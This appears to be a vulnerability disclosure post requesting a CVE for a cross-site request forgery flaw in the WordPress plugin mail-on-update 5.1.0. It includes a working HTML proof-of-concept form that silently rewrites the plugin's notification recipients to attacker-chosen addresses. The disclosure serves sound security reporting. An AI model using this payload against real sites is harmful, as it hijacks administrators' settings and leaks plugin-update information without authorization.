Can I get 2013 CVE for WordPress plugin mail-on-update CSRF vulnerability. PoC for "List of alternative recipients" below. Tested 5.1.0 version. Homepage: http://wordpress.org/extend/plugins/mail-on-update/ Code: http://plugins.svn.wordpress.org/mail-on-update/trunk/ <html><form action="https://example.com/wp/wp-admin/options-general.php?page=mail-on-update"; method="post" class="buttom-primary"> <input name="mailonupdate_mailto" type="hidden" value="example0 () example com example1 () example com example2 () example com example3 () example com example4 () example com example5 () example com example6 () example com example7 () example com example8 () example com example9 () example com example10 () example com henri+monkey () nerv fi" /> <input name="submit" type="submit" value="Save"/></form></html> If attacker adds random email to that form default user won't get emails and attacker might be interested to receive these as the email contains information of available plugin updates.